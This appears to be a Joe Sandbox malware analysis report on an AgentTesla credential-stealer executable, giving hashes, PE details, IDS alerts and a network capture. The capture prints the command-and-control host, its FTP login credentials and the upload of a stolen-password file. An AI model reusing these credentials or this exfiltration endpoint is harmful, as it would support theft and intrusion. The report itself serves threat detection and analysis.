                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ftp.wapination.net0%Avira URL Cloudsafe
                    http://wapination.net0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    wapination.net
                    		108.179.234.136
                    		truetrue
                      		unknown
                      ftp.wapination.net
                      		unknown
                      		unknowntrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ftp.wapination.netSecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://wapination.netSecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        108.179.234.136
                        		wapination.netUnited States
                        		46606UNIFIEDLAYER-AS-1UStrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1460072
                        Start date and time:2024-06-20 14:22:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 132
                        • Number of non-executed functions: 6
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        08:23:05API Interceptor6x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        108.179.234.136SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeGet hashmaliciousAgentTeslaBrowse
                          Shipping Documents_pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            Quotation_#432768#_pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                Payment_Advice-pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  UNIFIEDLAYER-AS-1USKMtvig5fAT.elfGet hashmaliciousMiraiBrowse
                                  • 173.83.210.166
                                  QUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 192.185.143.105
                                  SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeGet hashmaliciousAgentTeslaBrowse
                                  • 108.179.234.136
                                  https://otn.yfm.mybluehost.me/DEGER/Get hashmaliciousHTMLPhisherBrowse
                                  • 50.87.228.40
                                  http://click.promote.weebly.com/ls/click?upn=u001.j4J8mTsZ9n-2BXC3bkpEGuz50lGHlGvT3cLvbLRz27U7nbCy34PZfKldvZdQOxbYfQdpIO_ubnWW9PtOQz4ZIQW6byamRrJvV5j5QxMrQNeuvOlUwUwzU3n7afK0DT02-2Fh-2FEn9XQfE8APy5dcMY7okiMp6dn50YqTbWhwGv3QOuBDJ8By3TyASAIn3f2BeroENda7C-2Bh-2FrggWUDbq1OQU0iatMdz9T8bavQMqv-2FLL82Npkt-2FIYVNbpHq9Lcjy0FdNvuGsRZBL7ecWgydm46XJJa1wVRMTOXteK65K54Kr77vFfheTxVJYv2E8w-2B-2B1PVXj-2BtfuBn6giqM-2BrM-2FU61gbtNM1DlWLB5XHsVf7zrgHgzoU6kXBL4eU-2BkyxXXRasTbCCo1dj-2BUUHPOVM-2Fwx5w21DPnZBOlPgxyxHi4jDX1qhrEQ78CzgyGNwQZdsmAxFRaEEiJyZyTtySZibbaRCzWjvrWyDXH5YKeHfRMiRfJza-2BT3dvDBMLJnd2JeDwihpfsRj-2BRpKPerWH9cGrZtMGU7RwaTFiYJCYZjFzK8gYF3W6VV-2FJIhQ-3D#2298789727398466500609:53:58%20PM06/18/2024%2009:53:58%20PM9fjkqicho4gezabpl2us1nvy0tx58m3wGet hashmaliciousHTMLPhisherBrowse
                                  • 50.87.228.40
                                  Transaction Notification.exeGet hashmaliciousAgentTeslaBrowse
                                  • 173.254.28.210
                                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                  • 162.241.253.174
                                  https://imoveisjsguimaraes.com.br/73/#akern@jerrypair.comGet hashmaliciousUnknownBrowse
                                  • 192.185.211.87
                                  shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                                  • 108.179.193.98
                                  https://luxsci-email.com/_LjLMz6YfdF3SADayiSEZ_/email-link/168507/2153/send-me?to=https://service.ringcentral.com@aerosupportfbo.com/access/auth/eups/cGVnZ3kud2VnbmVyQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==Get hashmaliciousUnknownBrowse
                                  • 50.87.153.94

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1301
                                  Entropy (8bit):5.334025345208678
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84VE4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hv
                                  MD5:DD73DEAF52D7B54E1FD77901C5004AE1
                                  SHA1:AD84320DFF21A9F0CD701FAD17A6DAF9CA27C8BD
                                  SHA-256:D380E8D10429989836AC76845B952EF0047FAC85A7B077E2214182B0CA850DDC
                                  SHA-512:CC2FBC32A17DB1DB18D9AD2795341C1150E1D6A14366D8F3E258717F93B4E1DD9023D52324315449885723FC7C180DFE62E29E88244EBD446AF2F705F474B49F
                                  Malicious:true
                                  Reputation:low
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.929377700995905
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  File size:644'096 bytes
                                  MD5:b3db9023fe215f9cc7ea9dc71387f111
                                  SHA1:a46281d24cb8b7101a3307d10d81ac93a3e3abc4
                                  SHA256:e67fccc9c4055f580dd361b3224a292ad2eb2b4f625b123a4f36872564c8c81b
                                  SHA512:b1b43fcca10d472dc7654335f029c02c20b83a08c3d9e9ca0ea40a5679544ded999e6d419dd9d39e04391e84f51675bb968b12ac8ddadbd62eec611cc0f99c31
                                  SSDEEP:12288:K7rRWIaMoZoOs7KfPAymEPYToMvI+CnD5TfVLrz/nr0ZMcit17MTQ:dP9AytwfwznD9VrrDcifQ8
                                  TLSH:4DD412C0B869FF81C97F43B554B340181BB6A55F2637E26B1F9530C92C22BC68A68F53
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sf................................. ........@.. .......................@............@................................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x49e9de
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66739ED9 [Thu Jun 20 03:15:37 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9e98c0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x600.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x9c9e40x9ca00cfa23ddeb6805e192669529bccf6d3e4False0.9534913083599361data7.936637319472689IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xa00000x6000x6008269ded43569c3c82074390c2d2ed468False0.431640625data4.114834708760093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xa20000xc0x200dd0699bc23d08449938e566fa2472dd5False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0xa00900x32cdata0.4433497536945813
                                  RT_MANIFEST0xa03cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  06/20/24-14:23:09.712885TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4970943985192.168.2.5108.179.234.136
                                  06/20/24-14:23:09.311887TCP2029927ET TROJAN AgentTesla Exfil via FTP4970821192.168.2.5108.179.234.136
                                  06/20/24-14:23:09.712885TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970943985192.168.2.5108.179.234.136

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 20, 2024 14:23:07.959564924 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:07.964571953 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:07.964647055 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:08.495738029 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.495973110 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:08.500859022 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.611702919 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.611854076 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:08.616686106 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.806467056 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.806607008 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:08.811480999 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.925967932 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:08.926120996 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:08.931056976 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.041934967 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.042676926 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.047542095 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.158538103 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.166553020 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.171681881 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.282438993 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.304318905 CEST4970943985192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.310246944 CEST4398549709108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.311553001 CEST4970943985192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.311887026 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.318975925 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.712625027 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.712884903 CEST4970943985192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.712948084 CEST4970943985192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.717772007 CEST4398549709108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.718241930 CEST4398549709108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.718302965 CEST4970943985192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.756690025 CEST4970821192.168.2.5108.179.234.136
                                  Jun 20, 2024 14:23:09.851047993 CEST2149708108.179.234.136192.168.2.5
                                  Jun 20, 2024 14:23:09.897192955 CEST4970821192.168.2.5108.179.234.136

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 20, 2024 14:23:07.629895926 CEST6026753192.168.2.51.1.1.1
                                  Jun 20, 2024 14:23:07.953522921 CEST53602671.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jun 20, 2024 14:23:07.629895926 CEST192.168.2.51.1.1.10xd8ccStandard query (0)ftp.wapination.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jun 20, 2024 14:23:07.953522921 CEST1.1.1.1192.168.2.50xd8ccNo error (0)ftp.wapination.netwapination.netCNAME (Canonical name)IN (0x0001)false
                                  Jun 20, 2024 14:23:07.953522921 CEST1.1.1.1192.168.2.50xd8ccNo error (0)wapination.net108.179.234.136A (IP address)IN (0x0001)false

                                  FTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jun 20, 2024 14:23:08.495738029 CEST2149708108.179.234.136192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21.220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Jun 20, 2024 14:23:08.495973110 CEST4970821192.168.2.5108.179.234.136USER pop@wapination.net
                                  Jun 20, 2024 14:23:08.611702919 CEST2149708108.179.234.136192.168.2.5331 User pop@wapination.net OK. Password required
                                  Jun 20, 2024 14:23:08.611854076 CEST4970821192.168.2.5108.179.234.136PASS sync@#1235
                                  Jun 20, 2024 14:23:08.806467056 CEST2149708108.179.234.136192.168.2.5230 OK. Current restricted directory is /
                                  Jun 20, 2024 14:23:08.925967932 CEST2149708108.179.234.136192.168.2.5504 Unknown command
                                  Jun 20, 2024 14:23:08.926120996 CEST4970821192.168.2.5108.179.234.136PWD
                                  Jun 20, 2024 14:23:09.041934967 CEST2149708108.179.234.136192.168.2.5257 "/" is your current location
                                  Jun 20, 2024 14:23:09.042676926 CEST4970821192.168.2.5108.179.234.136TYPE I
                                  Jun 20, 2024 14:23:09.158538103 CEST2149708108.179.234.136192.168.2.5200 TYPE is now 8-bit binary
                                  Jun 20, 2024 14:23:09.166553020 CEST4970821192.168.2.5108.179.234.136PASV
                                  Jun 20, 2024 14:23:09.282438993 CEST2149708108.179.234.136192.168.2.5227 Entering Passive Mode (108,179,234,136,171,209)
                                  Jun 20, 2024 14:23:09.311887026 CEST4970821192.168.2.5108.179.234.136STOR PW_user-675052_2024_06_20_08_23_07.html
                                  Jun 20, 2024 14:23:09.712625027 CEST2149708108.179.234.136192.168.2.5150 Accepted data connection
                                  Jun 20, 2024 14:23:09.851047993 CEST2149708108.179.234.136192.168.2.5226-File successfully transferred
                                  226-File successfully transferred226 0.117 seconds (measured here), 2.68 Kbytes per second

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:08:23:04
                                  Start date:20/06/2024
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                                  Imagebase:0xc70000
                                  File size:644'096 bytes
                                  MD5 hash:B3DB9023FE215F9CC7EA9DC71387F111
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:08:23:05
                                  Start date:20/06/2024
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                                  Imagebase:0xe60000
                                  File size:644'096 bytes
                                  MD5 hash:B3DB9023FE215F9CC7EA9DC71387F111
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:11.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:104
                                    Total number of Limit Nodes:11
                                    execution_graph 37623 12ed01c 37624 12ed034 37623->37624 37625 12ed08e 37624->37625 37631 5581e98 37624->37631 37635 5580ad4 37624->37635 37644 5580a60 37624->37644 37653 5582c08 37624->37653 37662 5581ea8 37624->37662 37632 5581ece 37631->37632 37633 5580ad4 CallWindowProcW 37632->37633 37634 5581eef 37633->37634 37634->37625 37638 5580adb 37635->37638 37636 5582c79 37640 5582c77 37636->37640 37682 5580bfc 37636->37682 37638->37635 37638->37636 37639 5582c69 37638->37639 37666 5582e6c 37639->37666 37672 5582d92 37639->37672 37677 5582da0 37639->37677 37647 5580a65 37644->37647 37645 5582c79 37646 5580bfc CallWindowProcW 37645->37646 37649 5582c77 37645->37649 37646->37649 37647->37645 37648 5582c69 37647->37648 37650 5582e6c CallWindowProcW 37648->37650 37651 5582da0 CallWindowProcW 37648->37651 37652 5582d92 CallWindowProcW 37648->37652 37650->37649 37651->37649 37652->37649 37654 5582c45 37653->37654 37655 5582c79 37654->37655 37657 5582c69 37654->37657 37656 5580bfc CallWindowProcW 37655->37656 37658 5582c77 37655->37658 37656->37658 37659 5582e6c CallWindowProcW 37657->37659 37660 5582da0 CallWindowProcW 37657->37660 37661 5582d92 CallWindowProcW 37657->37661 37659->37658 37660->37658 37661->37658 37663 5581ece 37662->37663 37664 5580ad4 CallWindowProcW 37663->37664 37665 5581eef 37664->37665 37665->37625 37667 5582e2a 37666->37667 37668 5582e7a 37666->37668 37686 5582e58 37667->37686 37689 5582e4a 37667->37689 37669 5582e40 37669->37640 37674 5582da0 37672->37674 37673 5582e40 37673->37640 37675 5582e58 CallWindowProcW 37674->37675 37676 5582e4a CallWindowProcW 37674->37676 37675->37673 37676->37673 37679 5582db4 37677->37679 37678 5582e40 37678->37640 37680 5582e58 CallWindowProcW 37679->37680 37681 5582e4a CallWindowProcW 37679->37681 37680->37678 37681->37678 37683 5580c07 37682->37683 37684 558435a CallWindowProcW 37683->37684 37685 5584309 37683->37685 37684->37685 37685->37640 37687 5582e69 37686->37687 37693 558429a 37686->37693 37687->37669 37690 5582e58 37689->37690 37691 558429a CallWindowProcW 37690->37691 37692 5582e69 37690->37692 37691->37692 37692->37669 37694 5580bfc CallWindowProcW 37693->37694 37695 55842aa 37694->37695 37695->37687 37696 133d6c0 DuplicateHandle 37697 133d756 37696->37697 37619 5581cf0 37620 5581d4a CreateWindowExW 37619->37620 37622 5581e14 37620->37622 37577 133d478 